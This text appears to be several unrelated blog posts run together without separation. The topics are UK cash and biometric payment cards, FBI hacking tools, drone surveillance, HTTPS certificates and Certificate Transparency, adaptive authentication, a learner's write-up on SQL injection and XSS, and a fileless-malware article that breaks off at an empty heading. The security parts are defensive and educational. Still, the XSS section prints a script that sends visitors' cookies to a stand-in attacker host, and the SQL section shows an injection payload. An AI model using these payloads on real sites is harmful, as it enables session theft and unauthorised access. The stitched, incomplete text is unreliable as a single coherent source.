With almost 500 UK cash machines being removed from service each month, cash is getting harder to find. Disadvantaged groups are more likely to rely on cash and some, such as those who do not have a bank account, have little choice but to use cash for everything. In 2017, people in the UK made more than 13 billion cash payments [1]. The choice seems clear: either ensure the continued availability of cash or make it easy for all members of society to go cashless.
Other countries have tackled this. For instance, Sweden has positioned itself as the front-runner to becoming a truly cashless society. In fact, four out of five purchases in Sweden are made electronically, and Sweden’s central bank, Riksbanken, estimates that between 2012 and 2020, cash in circulation will have declined by 20–50 per cent. What can the UK learn from Sweden? Although Sweden experienced similar reservations to the notion of a transformation into a fully cashless nation from certain groups that are dependent on traditional currency, Riksbanken also emphasised that the answer lies in making sure that cash services are still provided. This would suggest that the ideal payment balance lies in offering people freedom, even if physical currency becomes rarer.
Furthermore, the Indian government has pushed the cashless agenda to tackle corruption and crime, and to draw in millions who currently live at the margins of society. One element of this is Aadhaar, a digital identity/authentication that relies on fingerprint biometrics. When linked with bank accounts or other methods, Aadhaar lets users authenticate payments, regardless of their literacy, income or access to formal banking.
A similar use of fingerprint biometric payment smart cards could overcome several of the problems we see in the UK. For example, the fool-proof authentication built into biometric pre-paid cards could help those currently unbanked to build a credit rating and gain access to products and services previously beyond reach.
When asked why they use cash at all, UK residents give a range of answers, including convenience, trust and choice issues [1]. People like having a choice of payment, and for that reason (as well as several others) the complete demise of all physical currency in the UK is still several years away. Even those who are happy to use cashless payments like to have cash as a back-up, while those who generally favour other forms of digital payment (PayPal, mobile wallets, etc.) keep cards for the same reason.
Ensuring trust in card payments is very important for consumers, banks and merchants alike. As such, where cash payments are currently preferred for convenience, the obvious response is to make card payments as easy and trusted as possible.
Where trust is a problem, this is often because consumers don't trust banks, the internet or the infrastructure needed to make cashless payments work [1]. There is a certain situational irony here, because cashless payments are actually far more traceable than cash. Yet some consumers remain wary: they need to be reassured that card payments are secure.
Here, biometrics are useful once more. While a signature can be forged and an online account hacked, a fingerprint is virtually impossible to replicate. What is more, consumers are used to seeing biometrics used in places where security is paramount, such as airports; they trust biometrics as a gold standard.
Cards with built-in biometric authentication help customers to overcome trust issues around digital payment. They are also, therefore, likely to help financial organisations who wish to draw in the sceptical consumer by reassuring them.
The Access to Cash review concludes that cash is unlikely to disappear from the UK completely, and that there are important reasons to keep it in circulation. However, it seems reasonable, given recent trends, to believe the use of cash will continue to fall and the use of alternatives, specifically payment cards, will rise.
It seems likely that the UK will ultimately become mostly, as opposed to completely, cashless, but preparation is key and the transition must be well supported. Rural areas must be sure they are able to access electronic money transactions, for example.
Fingerprint biometric smart cards are safer and more accessible, allowing even those without formal banking identities to make cashless payments securely and reassuring the most nervous banking clients. After all, many UK schools already give pupils (who are of course, largely ‘unbanked’) biometric cards with which to pay for their school lunches — it looks as though that’s a lesson we could all do with learning.
In a recent Wired.com exposé, the magazine reveals how the FBI has been secretly hacking civilian computers for about 20 years; thanks to Rule 41, its ability to hack has been expanded.
Nevertheless, effective record keeping for these hacking incidents doesn’t exist. For instance, search warrants that permit hacking are issued using elusive language, and this makes it difficult to keep track of when the feds hack.
Also, it’s not required for the FBI to submit any reports to Congress that track the FBI’s court-sanctioned hacking incidents—which the FBI would rather term “remote access searches.”
So how do we know this then? Because every so often, bits of information are revealed in news stories and court cases.
- Carnivore, a traffic sniffer, was the FBI's first known remote access tool; Internet Service Providers allowed it to be installed on network backbones starting in 1998.
- This plan got out in 2000 when EarthLink wouldn’t let the FBI install Carnivore on its network.
- A court case followed, and the name “Carnivore” certainly didn’t help the feds’ case.
- Come 2005, Carnivore was replaced with commercial filters.
The FBI had an issue with the encrypted data it was intercepting. The advent of keyloggers solved this problem: a keylogger records keystrokes, capturing them before the encryption software does its job.
The Scarfo Case
- In 1999 a government keystroke logger targeted Nicodemo Salvatore Scarfo, Jr., a mob boss who used encryption.
- The remotely installed keylogger had not yet been developed at this time, so the FBI had to break into Scarfo’s office to install the keylogger on his computer, then break in again to retrieve it.
- Scarfo argued that the FBI should have had a wiretap order, not just a search warrant, to do this.
- The government, though, replied that the keylogger technology was classified.
- The Scarfo case inspired the FBI to design custom hacking tools: enter Magic Lantern, a remotely installable keylogger that arrived in 2001.
- This keylogger also could track browsing history, passwords and usernames.
- It’s not known when the first time was that Magic Lantern was used.
Privacy in the Era of Drones and Aerial Surveillance
Unmanned Aerial Vehicles (UAVs), or drones, have flown into our lives both as commercial and military hardware and as consumer hobbyist gadgets. Drones are genuinely useful, hence the massive market and enormous demand for them. The possibilities for drones in an industrial setting are vast: industrial monitoring; aerial surveillance; aerial photography that, linked to AI, provides machine vision; even smart agriculture flies on the back of drones. And who doesn't want a drone, just for the fun of it?
Today, unmanned aircraft carrying cameras have become very affordable and accessible to the general public, opening a new avenue for aerial surveillance of day-to-day American life.
What Can Drones Do?
Unmanned aerial vehicles (UAVs), usually referred to as "drones," have proved surprisingly versatile in their short history. Among other applications, drones are used for building inspection, firefighting, journalism, conservation, agriculture, aid distribution, archaeology, military missions, and law enforcement.
Drones are really remarkable devices. They can float in midair, do backflips and spins; they can travel effortlessly and precisely across narrow spaces or in tandem with other drones, and they can do all this while holding items like a stabilized video camera and a multitude of other technology on board. The extent of their flexibility is what makes them a viable choice for a range of different tasks. Drones can be used as weapons in distant wars, or they can help to re-invent the way humanitarian aid is delivered. Drones may help advance science study, or they can do tracking, monitoring, and surveillance work.
Drones are often cited as a suitable alternative to manned flights, primarily due to their versatility and unique capabilities. Drones can provide continuous, highly focused, and low-cost surveillance. They can be deployed on demand and can usually stay in the air longer than manned aircraft. They are versatile in the tasks they can perform, they can carry high-resolution imagers and sensors, and their "plug and play" payload flexibility makes them easy to customize for a particular flight purpose. They can also cover vast and remote areas. Some of the latest surveillance technologies that can be applied to drones include:
- High-power zoom lenses that could improve the likelihood of individuals being observed from a distance;
- Night vision, ultraviolet, infrared thermal imaging, and LIDAR (light detection and ranging), enabling UAVs to detect and enhance detail;
- Radar technology systems that can penetrate walls and soil, allowing individuals to be monitored within houses, through cloudy environments, and foliage;
- Video analytics technology which is evolving rapidly and will be able to recognize and react to individual persons, events, and objects, or even flag changes in routines to detect particular patterns of activity as “suspicious.” It may also involve items like license plate readers.
- Distributed footage where a variety of UAVs operate in tandem with several video cameras;
- Facial recognition or other “simple biometric recognition” that allows the UAV to recognize and monitor personal attributes such as height, age, gender, and skin color.
According to a report released by the Pentagon, the Department of Defense's use of drones for aerial surveillance has reached an all-time high in American history. Armed drones have traditionally been used abroad in war zones like Syria, Yemen, Somalia, Iraq, and Afghanistan to launch counter-offensive attacks on terrorist groups and other militias. Domestically, the Department of Defense has used drone surveillance to help fight fires and to support operations at domestic DoD facilities and military bases. The DoD has also utilized drone surveillance to support civil authorities at the southern border and in hurricane and flood response, as well as in civil law enforcement, counter-drug, and counterterrorism operations.
The use of drones for aerial surveillance is seen as a development that could revolutionize traffic accident reconstruction procedures. Drone aerial surveillance has also proved very useful in traffic management, telecommunications (creation of temporary networks), farming, and many other applications still in trial phases.
What Is the Problem With Drone Surveillance?
Concerns about both private and state use of drones for surveillance are being raised by civil rights and liberties groups such as the Electronic Frontier Foundation (EFF). These groups and others are calling for tighter controls on the use of drones to protect individuals' right to privacy. The U.S. drone regulations established by the Federal Aviation Administration (FAA) resemble U.S. data protection laws in being supplemented on a state-by-state basis. Several other countries are also addressing the use of drones and have written privacy-rights guidelines into legislation. Yet this is a moving target (pun intended), and keeping laws up to date with technology is a challenge.
The information that drones gather, especially when used by governments or law enforcement, can be tremendously sensitive and drones may provide a backdoor for hackers to access vast amounts of data stored not only on that particular device – but also on a central server to which it is connected.
There is a huge question as to whether current laws that exist across the globe in different jurisdictions can adequately protect ordinary people from the privacy threats presented by drone technology.
Invasive Aerial Surveillance Can Identify You
With its capacity for accurate zooming from a distance, aerial surveillance, combined with other automated identification technologies, will allow the easy cataloging of individuals and their activities. Two major automated identification technologies could enable easy identification from vast distances: automatic license plate readers and facial recognition. Both are now commonly used by government agencies. U.S. Immigration and Customs Enforcement operates a national network of electronic license plate readers to track people, and the FBI operates a facial recognition database covering roughly half of U.S. adults, which it makes available to law enforcement authorities across many states.
This means that the government could track sensitive activities and catalog individuals. Any person attending or leaving a political meeting, a union meeting, or a lawyer's office could be recognized and cataloged. A drone could zoom in and check all the cars parked outside a medical center or church, and make a list of attendees in seconds without any human effort. Such concerns are not speculative. Research by the American Civil Liberties Union revealed that the FBI was using aerial surveillance to monitor protesters' actions in Baltimore. Vendors selling drones to police departments stress their ability to pick individuals out of public events, such as a political rally, as a benefit, not a source of potential abuse.
Censoring Discriminatory Surveillance Through Redaction
Drone and aerial surveillance, if put to good use, has tremendous benefits, but we cannot dispute that it is prone to abuse. Take police crowd monitoring, for example: if faces are blurred, for instance through automated video redaction, analysts will focus on suspect behavior rather than identity, avoiding discriminatory targeting. Privacy protection filters can also be applied to body silhouettes and cars, so that faces, license plates, and accessories are all filtered at the same time.
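As a rough illustration of what automated redaction involves, the snippet below blurs detected faces in a single video frame using the Haar-cascade face detector that ships with OpenCV. This is a toy sketch, not any vendor's pipeline; production systems use far more robust detectors and also handle license plates and tracking across frames.

```python
import cv2  # pip install opencv-python

detector = cv2.CascadeClassifier(
    cv2.data.haarcascades + "haarcascade_frontalface_default.xml")

def redact_faces(frame):
    """Blur every detected face region in a BGR video frame, in place."""
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    for (x, y, w, h) in detector.detectMultiScale(gray, scaleFactor=1.1,
                                                  minNeighbors=5):
        roi = frame[y:y + h, x:x + w]
        frame[y:y + h, x:x + w] = cv2.GaussianBlur(roi, (51, 51), 0)
    return frame
```

Run per frame over a video stream, this is the kind of filter that lets an analyst see behavior without seeing identities.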
Celebrities, for example, are besieged by paparazzi drones, which have become a permanent fixture in their neighborhoods. This poses a risk to showbiz firms that release such images without properly redacting minors and other sensitive, personally identifiable details from the videos before posting them online. It can be addressed with video redaction services such as the one provided by CaseGuard Studio. To go hand in hand with domestic drone protection laws, it is imperative to adopt video redaction software for drones that can censor images in real time.
For any new technology, we need to build in privacy and protection from the start. Yet, like other innovations, these two considerations are often forgotten in the race to market required to succeed in a very competitive world.
Legislation is underway to monitor security issues that may impact drones during manufacturing. Nonetheless, this is not something that legislation alone can solve, particularly in a fast-paced technology environment. Drone users must ensure that all specific safety requirements are met. This involves the use of robust video redaction software. Other areas, like encryption, password hygiene, and firmware updates, should be part of the general ownership routine that a responsible drone owner performs.
Therefore, through proper deployment and utilization of video redaction software, drones will not be viewed as a problem that needs to be addressed but rather an opportunity that should be embraced. But this can only happen if the privacy of the citizens is guaranteed, and this can only happen through the use of video redaction in minimizing the negative effects of drone surveillance on the private lives of the public.
What’s the latest with HTTPS and SSL/TLS Certificates?
We’ve written quite a lot in past FYI Blog posts about SSL/TLS certificates, the critical building block to secure communication on the Internet. We described what such certificates were, their use in securing the communications channel between a client (browser) and a server, different types of certificates and the pros and cons of using each.
Given the changes in the Internet landscape over the past five years, we feel it is time to revisit these topics. The technical details described in the earlier posts remain unchanged. What has changed, though, are the traffic patterns for HTTPS-based communications, additional vulnerabilities arising as a consequence and ways to mitigate these. This post will provide a general overview of certain changes in the Internet landscape over the past few years, while subsequent blog posts will describe some of the topics identified here in greater detail.
There has been a growing movement to strive for encrypting all communications on the Web, not just those that require user credentials for access to content and services. As early as 2014, Google converted access to its own services (Gmail, Search, etc.) over HTTPS only, and announced that it would make use of HTTPS as an input in its search ranking algorithm (as a minor factor, initially, but broadly hinting at a greater role in future). Google’s stated motives were to “make the Internet safer more broadly”, which is plausible as most people access content via a Google search. Increasingly, popular sites such as Facebook and Twitter also took up this cause, leading to the steady penetration of HTTPS-by-default access. The initial cynicism from ISPs and other intermediaries on this trend, based on the belief that such a move was self-serving rather than altruistic as it allows these large players to hide valuable analytics data on user behavior, was overtaken by the Snowden leak and other high profile revelations of pervasive surveillance of end-to-end communications which helped get the public, both in the US and abroad, generally supportive of the all-encrypted Web program.
Google and other major industry players further greased the path towards fully encrypted communications by standardizing the next generation of HTTP, called HTTP/2, which removes major performance inefficiencies identified with HTTP over the years. While HTTP/2 does not require TLS, all browser vendors have chosen to implement HTTP/2 with mandatory TLS usage, so that web sites wishing to provide the performance advantages offered by the new protocol must use TLS by default. The share of HTTP/2-enabled sites shows an upward trajectory, currently at about 15.5%, and includes most of the popular web sites.
Thus, by early 2017, the Electronic Frontier Foundation (EFF) was able to report that half of the Web's traffic is now encrypted. EFF cites data from major browser vendors (Firefox, Chrome) which show that ~50% of web pages loaded using such browsers are now protected by HTTPS. Several factors explain this startling growth over the preceding three years. Larger players have, of course, the resources needed to make the necessary changes to their backends to make HTTPS the default, while smaller players have been helped by organizations such as the EFF and the Internet Security Research Group (ISRG), which provide tools and best practices to help webmasters make the necessary conversions. The ISRG, in particular, created Let's Encrypt, an open and automated Certificate Authority (CA) which allows anyone to easily obtain a Domain Validated (DV) certificate — for free! This last point removes one major excuse for small web sites, so that the cost argument can no longer be used to not get on board with the program. In fact, the growth of Let's Encrypt certificates has been phenomenal, making it comparable (depending on how one counts the issued/active certificates) to those of the industry giants which, however, also offer more robust forms of certificates (Extended Validation (EV), Organization Validation (OV)). However, the proliferation of such easily obtainable DV certificates adds an additional level of vulnerability that we shall discuss later in this post.
But what about the other 50% of the surveyed Internet, comprising servers which do not support HTTPS? Very few web sites are self-contained, providing all the necessary content to the end user. It is quite common for a single page request to require access to other third-party servers to pull in images, scripts and, most important, advertisements. Thus, even if the initial page requested is over HTTPS, the other connections made to retrieve external content that populates the page might not be. A correctly configured browser will penalize such sites and mark them as non-secure, or refuse to download additional content from external unsecured servers. With cost no longer an excuse, the main reason for not migrating to HTTPS, beyond laziness, is the requirement to ensure that all of a site's content is delivered via HTTPS. This requires a site's content manager to work with partners hosting additional content to ensure that those partner sites also deploy HTTPS. This often time-consuming manual process is one reason for the slow uptake by the other half. These are often small to medium-sized sites with less traffic and fewer resources to spare for such a migration in the near term. (As an aside, such sites are also the sort that primarily benefit from a simple and free DV certificate.)
Returning now to the proliferation of free DV certificates, it is important to remember that this type of certificate requires minimal checks by the issuer (the CA) on the organization requesting the certificate, with no warranties provided against misrepresentation to those who rely on such certificates. (Indeed, all that is required to obtain a Let's Encrypt DV certificate is proof that the requesting organization "owns" the domain, which can be shown by either provisioning a DNS record for the domain in question or showing the ability, at the time of requesting the certificate, to add a given HTTP resource under that domain name.)
It is worth recalling that a properly signed server DV certificate presented during the initial SSL/TLS handshake asserts only that the given public key belongs to the specific domain, and that this binding is valid for a given time period. It says nothing about the organization that hosts or owns the domain name. While the cryptographic techniques used by HTTPS to set up a secure connection can detect forged or fake certificates, they cannot detect perfectly valid certificates issued to fake organizations, or certificates issued by a compromised CA. An example of this is the alarming number of Let’s Encrypt DV certificates issued to domains containing the word “paypal”. (PayPal appears to be most phishers’ go-to choice, but other popular domains are also targeted.) Such certificates pass all the necessary cryptographic checks, and a browser will display the reassuring green lock icon when rendering a rogue page formatted to resemble the PayPal portal. Very few users would look under the hood at the site’s certificate and run some checks of their own. To rebut the charge of laziness for not doing more to keep such malicious domains from obtaining certificates, Let’s Encrypt has offered a rationale for its copious provisioning of DV certificates, arguing for the importance of meeting its stated objective – greater penetration of HTTPS – and noting the complexities of monitoring site content and ownership, which, it believes, a CA is ill equipped to do.
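For readers who do want to peek under the hood, a short script can fetch and print the certificate a site actually presents. Here is a minimal sketch using Python’s standard-library ssl module (the host name is just an illustrative placeholder):

import socket
import ssl

def inspect_certificate(hostname: str, port: int = 443) -> None:
    """Print the certificate a server presents during the TLS handshake."""
    context = ssl.create_default_context()  # uses the system's trusted CA store
    with socket.create_connection((hostname, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()
    # The subject merely binds the key to a domain name -- note the absence
    # of vetted organization details on a typical DV certificate.
    print("subject:", dict(pair[0] for pair in cert["subject"]))
    print("issuer:", dict(pair[0] for pair in cert["issuer"]))
    print("valid until:", cert["notAfter"])

inspect_certificate("www.example.com")

Even this quick check only confirms that the certificate chains to a trusted CA and matches the domain – it cannot tell you whether the organization behind the domain is trustworthy, which is exactly the gap described above.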
To be fair, other well-known CA providers have also unintentionally issued certificates to malicious sites. We recently wrote a post about Google reducing its trust in certificates issued by Symantec and its subsidiaries – and these include EV certificates, which require a much more rigorous level of verification of the requesting organization before issuance! As we pointed out in that post, the entire system of encrypted communications on the Web depends on the trust we place in the CAs. If a CA’s certificate-issuing processes are compromised, the end user lives in a fool’s paradise where the green lock icon is always taken as an indicator of safety.
What, then, can be done to restore the trust in the SSL/TLS certificate ecosystem that is so essential in this world of ever-growing HTTPS Everywhere?
Quis custodiet ipsos custodes?
Who will guard the guardians themselves?
That question is as pertinent to us in this new world of HTTPS Everywhere and compromised (or, as some might suggest, lazy) CAs as it was in Juvenal’s times.
A key concern with the circulation of cryptographically valid certificates issued by a compromised CA is the length of time it takes for this information to circulate and for the certificates to be revoked and blacklisted. Our post on the Google–Symantec altercation describes how that matter dragged on for three years before the current resolution. One way to improve the timeliness of discovering mis-issued certificates is Certificate Transparency, an experimental proposal by Google, which Google has implemented and which has since been placed on the path to becoming an Internet Standard via the open, consensus-based process of the Internet Engineering Task Force (IETF), the technical forum that creates standards (such as HTTP and TLS) for use on the Internet. Google has since created an eponymous organization and open source project to promote the implementation of Certificate Transparency.
The details of how Certificate Transparency works are complex, and we shall devote a future post to describing it in greater depth, along with the changes it imposes on the SSL/TLS ecosystem – the CAs, browsers, and other involved (some new) parties. Until then, a brief description of the overall architecture of Certificate Transparency (CT) follows.
In essence, Certificate Transparency works by having each CA publish its newly issued certificates to a publicly visible and auditable log. Any party – especially one whose domain name is apt to be spoofed – can study these logs and check whether any issued certificate uses its domain name (or parts thereof) without authorization. Such transparency is expected to lead to quicker mitigation of the harmful effects of mis-issued certificates, such as rapid updates to revocation lists. The normal resolution processes already in place are not changed – but the time lag between the error and corrective action is considerably shortened, ideally to hours instead of days, weeks, or months. One can expect new business entities to arise that, as a service, monitor these logs on behalf of paying customers for certificates mis-issued for their domains.
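As a small taste of what such monitoring might look like, the sketch below polls a public certificate search service for logged certificates matching a brand keyword. The crt.sh endpoint and its JSON output format are assumptions used for illustration; a production monitor would follow the CT logs themselves.

import json
import urllib.request

def find_suspicious_certs(keyword: str, legitimate_suffix: str) -> None:
    # Query a public CT search service (crt.sh is assumed here) for
    # logged certificates whose names contain the brand keyword.
    url = f"https://crt.sh/?q=%25{keyword}%25&output=json"
    with urllib.request.urlopen(url, timeout=30) as resp:
        entries = json.load(resp)
    for entry in entries:
        for name in entry.get("name_value", "").splitlines():
            # Flag anything that is not the brand's own domain for review.
            if not name.endswith(legitimate_suffix):
                print(entry.get("not_before"), name)

find_suspicious_certs("paypal", "paypal.com")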
The critical component in the system, therefore, is the log; much of the technical work is devoted to its structure and to ensuring that its data remains cryptographically assured as entries are appended, so that the log cannot be retroactively manipulated. Another entity, called an auditor, can verify whether a log holds corrupted data and can also query whether a particular certificate has been logged. A negative answer to the latter can indicate that the certificate is fraudulent, since all newly issued certificates should – if this system is to work as intended – be logged.
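The append-only property comes from organizing the log as a Merkle hash tree. Below is a simplified sketch of how an auditor might verify that an entry is included, given the leaf, its audit path, and the tree root; for simplicity it assumes a perfectly balanced tree (RFC 6962 defines the general rule).

import hashlib

def leaf_hash(entry: bytes) -> bytes:
    return hashlib.sha256(b"\x00" + entry).digest()  # 0x00 prefix marks a leaf

def node_hash(left: bytes, right: bytes) -> bytes:
    return hashlib.sha256(b"\x01" + left + right).digest()  # 0x01 marks an interior node

def verify_inclusion(entry: bytes, audit_path: list, root: bytes, index: int) -> bool:
    # Recompute the root from the leaf upward; any tampering changes the result.
    h = leaf_hash(entry)
    for sibling in audit_path:
        h = node_hash(sibling, h) if index % 2 else node_hash(h, sibling)
        index //= 2
    return h == root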
From a client’s point of view, an additional parameter obtained during the logging process is included in the TLS handshake, allowing the client to verify that the offered certificate was added to a log at a certain time and that the log entry was indeed issued for that particular certificate.
As you can see, the devil’s in the details, which is why a dedicated post is needed to more fully explain the nitty-gritty, as well as the nuances, of the solution.
To go back to the quotation that heads this section, Certificate Transparency provides at least one mechanism for oversight of the actions of the CAs – the guardians of the trust system that underlies the entire certificate ecosystem. Over time, it is hoped, its use will become commonplace: a well-controlled and audited additional tool in the security infrastructure that so critically underpins the functioning of the web.
Note that HTTPS-based communications allow intermediaries (such as your ISP) to learn only which domain (and IP address) was visited, and not much else beyond that. On unencrypted channels, ISPs can perform deep packet inspection to provide what are, from their perspective, “value-added” services.
Note also that not all browsers use a lock icon – some show the word “Secure”. We shall write a future post on the ways different browsers make the results of the certificate check visible.
Multi-Factor Authentication (MFA) is an electronic authentication method that gives users access to a website, application, or VPN only after they successfully provide two or more verification factors. Requiring multiple verification factors reduces the likelihood of a successful cyberattack. Although Multi-Factor Authentication is highly recommended whenever it is available, it isn’t faultless – and an improvement on these security methods is reportedly in the works. Continue reading to learn more about possible developments on the horizon.
Multi-Factor Authentication (MFA) Has its Issues
Requiring additional authentication factors before granting access to an account or application clearly makes that account or application much more secure. However, it can also put too many hurdles in front of the members of your team, which can leave employees bothered and less engaged.
In addition, the most commonly used mode of Multi-Factor Authentication is a generated code delivered through a smartphone. This requires everyone to have their cell phone with them and ready at all times. Unfortunately, people forget their phones, batteries die, and phones break – which makes Multi-Factor Authentication less practical than one might hope.
The security benefits of Multi-Factor Authentication are obvious, but so are the added stresses that come with it.
Adaptive Authentication Can Reduce This Stress
Some organizations have begun utilizing a new approach called adaptive authentication. Instead of requiring multiple forms of verification up front, adaptive authentication collects various kinds of data, mostly based on the user’s behavior. Most of the time, a workday follows regular, consistent patterns: each user has a characteristic way of typing and of using the mouse or trackpad. Adaptive authentication analyzes these patterns of behavior to build a profile, compares each new session against that profile, and grants access when everything matches – in effect, continuously checking whether the user is who he or she claims to be.
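A toy sketch of the idea might look like the following. Every signal, weight, and threshold here is an illustrative assumption; real adaptive authentication engines use far richer behavioral telemetry and statistical models.

from dataclasses import dataclass

@dataclass
class LoginAttempt:
    device_id: str
    location: str
    hour: int            # hour of day, 0-23
    typing_speed: float  # characters per second

# Baseline profile learned from the user's past behavior (made-up values).
PROFILE = LoginAttempt("laptop-42", "Fort Lauderdale", 9, 5.2)

def risk_score(attempt: LoginAttempt) -> int:
    # Score how far this attempt deviates from the learned profile.
    score = 0
    if attempt.device_id != PROFILE.device_id:
        score += 40   # an unknown device is the strongest signal
    if attempt.location != PROFILE.location:
        score += 30
    if abs(attempt.hour - PROFILE.hour) > 4:
        score += 15
    if abs(attempt.typing_speed - PROFILE.typing_speed) > 1.5:
        score += 15
    return score

attempt = LoginAttempt("unknown-phone", "elsewhere", 3, 2.1)
if risk_score(attempt) >= 40:
    print("Unusual behavior: step up to a multi-factor challenge")
else:
    print("Behavior matches profile: grant access")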
If an action is out of the ordinary, a multi-factor challenge is issued. For example, if an unfamiliar device attempts to access someone’s data from a new place at an unusual time, additional verification is requested. If everything checks out, users can access whatever they need without any difficulty.
By balancing security with convenience, adaptive authentication is ideal for most people, and the method has already been adopted by companies in various industries. Although it may not yet be available to small- or medium-sized businesses, it is definitely something to keep in mind for the future.
At AE Technology Group, we are always striving to help you and your business maintain security within your business operations, in the hope of improving your company’s overall productivity and efficiency. For any questions, or to learn more about adaptive authentication, give us a call today at 954.474.2204.
As organizations and individuals continue to look for ways to ensure the security of digital information and move away from a world of passwords, one option that has been tossed around for several years includes the collection and analysis of specific human body characteristics. Eye retina scans, fingerprints and voice samples are all examples of a type of security system commonly referred to as biometrics.
It is important to note, however, that the use of biometrics is not a new concept. In fact, fingerprints have been in use since about 500 B.C., when Babylonian businessmen first pressed them into clay tablets to record business transactions.
Today, this digital security measure is useful in some low-level security environments, such as clocking into a job, where convenience and ease of use are the primary drivers. In this regard, today’s technologies are making digital fingerprints useful for rudimentary authentication purposes.
When approached as the end-all, be-all solution for digital security, however, biometrics has a few shortcomings that make it less than ideal. Most notably, if a person’s biometric data is stolen, their identity is in serious jeopardy.
While digital certificates can be revoked, once a person’s biometrics get into the hands of a malicious third party, there is no way of getting the information back. You can’t, in other words, revoke someone’s DNA. For this reason, some jurisdictions require that biometrics be stored on devices controlled by the individual, not by agencies or organizations.
Further drawbacks can be found in the difficulty and cost of actually collecting biometric information. Voice verification, for instance, requires little to no background interference to work properly. Facial recognition software requires that a person line up squarely with a camera for authentication purposes. Additionally, a person’s face will change over time.
The use of biometrics presents an interesting case when it comes to the protection of digital information. Right now, options are readily available for consumers. However, until there is an affordable, secure solution to employing them, adoption will be slow.
What are your thoughts on biometrics? Do you have a comprehensive plan as to how they can be carried out in an effective manner? We would love to hear your thoughts in the comments section below.
I have now completed the first course in my queue! Since the last post, I have been digging into website hacking. This is of course a big area and a massive element of day-to-day information security. I went through various avenues and implementations of SQL injection attacks, XSS (Cross-Site Scripting) attacks, and more. I also learned about protecting against these sorts of attacks, and had a brief introduction to how vulnerability scanning can be automated with scanning tools. Of course, once you have your scan output ready, put it into Dradis and produce a custom no-fuss report!
Trying out the SQL injection procedures meant attacking a deliberately vulnerable web server in Metasploitable. Insecure SQL database calls in a website or web application can let attackers extract or modify information, or gain access even without passwords. An SQL injection vulnerability on one site can potentially undermine the security of every site and application hosted on that web server. As the instructor put it: if there is an SQL injection vulnerability on the target site, bingo, game over – you as an attacker can ultimately do virtually anything you want with that site.
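To illustrate the class of bug, here is a hypothetical sketch using Python’s built-in sqlite3 module. The first query splices user input directly into the SQL string; the second uses a parameterized query, which is the standard fix.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

supplied_name = "x' OR '1'='1"  # a classic injection payload

# VULNERABLE: the OR '1'='1' clause matches every row -- login bypassed.
rows = conn.execute(
    "SELECT * FROM users WHERE name = '" + supplied_name + "'"
).fetchall()
print("vulnerable query returned:", rows)

# SAFE: a parameterized query treats the input as data, never as SQL.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (supplied_name,)
).fetchall()
print("parameterized query returned:", rows)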
With XSS vulnerabilities, an attacker essentially gets a site to serve their script to other visitors. As an example, a commenting feature on a web page with an XSS vulnerability means the injected script runs for every visitor to that page. What makes this insidious is that the script runs in visitors’ browsers even though it was never part of the base web page. An insecure website can therefore jeopardize the security of third parties – which is why owners of web pages, web applications, and web hosts have a responsibility to protect their sites so that third parties are not affected.
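The core defence on the site’s side is to escape user-supplied content before rendering it into a page. A minimal sketch with Python’s standard-library html module:

import html

comment = '<script>document.location="https://evil.example/?c=" + document.cookie</script>'

# Served raw, this comment would run in every visitor's browser.
# Escaped, the markup becomes harmless text.
print(html.escape(comment))
# -> &lt;script&gt;document.location=&quot;https://evil.example/?c=&quot; + document.cookie&lt;/script&gt;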
The course closed with a very brief introduction to ZAP (Zed Attack Proxy), one of many tools for automating vulnerability scanning. The point of this course was to show the theory behind security vulnerabilities and the sorts of attacks that hackers can carry out. Now that I have been introduced to the nuts-and-bolts, step-by-step methods of attacking devices and applications, the path is open to learning more about particular focus areas and to thinking about scripting and automation. I do have some more studies coming up to these ends: I intend to learn more about hacking using Android, I need to learn more about networking vulnerabilities, and I would like to learn more about scripting and scan automation through software like ZAP and Burp, both of which have official Dradis plugins. I already manipulate their plugin outputs most days when building Dradis templates, so it would be fun to create those outputs as well!
Fileless malware is malicious activity that infects a system using legitimate, built-in native programs. In contrast to other malware such as ransomware, attackers don’t need to install a malicious program on the system to execute an attack, which makes it hard to detect and prevent. A traditional antimalware solution detects malware by matching files against a database of known malicious programs. Fileless malware payloads, however, reside only in memory and write no files to the hard drive, making them difficult for signature-based security solutions to detect. For this reason, cybersecurity experts agree that attackers are ten times more likely to succeed when executing fileless malware attacks than file-based attacks.
The Rising Threats of Fileless Malware
An analysis by the Cyber Threat Intelligence (CTI) team at the Multi-State Information Sharing and Analysis Center (MS-ISAC) indicates that fileless malware will cause 50% of cyberattacks targeting complex enterprise IT environments in 2022. The ability of fileless malware to evade detection by traditional security tools has made it a favorite among hackers, with reports showing that fileless attacks tripled between February and March 2022.
Moreover, attackers have increased their use of fileless attack techniques, also known as living-off-the-land (LotL) techniques, in which malicious scripts hide in computer memory and use the installed libraries, binaries, and legitimate programs to spread infection across the system.
How Fileless Malware Works
Fileless malware provides attackers with two main benefits: it writes no files to disk, making it nearly impossible to detect using traditional antivirus programs, and the absence of files means there is nothing for forensic investigators to discover. But how is it delivered to the target computer system?
Since attackers must inject the malware directly into memory, they first gain access to the target environment using known methods. For example, they can exploit unpatched vulnerabilities in installed programs or operating systems, or use stolen credentials; once they have access, they inject the malware directly into the memory of legitimate applications.
In addition, attackers can inject fileless malware into the target computer’s systems, files, protocols, and applications under the following scenarios:
- Phishing emails: Attackers craft phishing emails to trick employees into visiting malicious sites or downloading harmful software. Although the websites may appear legitimate, clicking a malicious one loads the fileless malware in the computer memory, permitting hackers to load additional harmful codes remotely and exfiltrating sensitive information.
- Native applications: Hackers target native applications, such as Microsoft PowerShell, and inject malicious code remotely. Legitimate programs running malicious scripts are hard to detect using normal antivirus solutions. For example, injecting the malicious code in Microsoft PowerShell permits attackers to run remote malicious scripts as legitimate PowerShell scripts without detection.
- Websites that appear legitimate: Hackers can create websites that seem legitimate but execute malicious scripts once you visit them. For instance, they may exploit vulnerable Flash plugins and inject malicious code into the browser’s memory.
In other words, fileless malware is designed never to write files to disk, as traditional file-based malware does. Instead, attackers write fileless malware directly into the random access memory of trusted applications, so that the application appears legitimate to a traditional anti-malware program while the malware runs in the background. This also complicates the work of a forensics examiner, since the malware leaves no traces on disk.
Recommended Prevention Measures
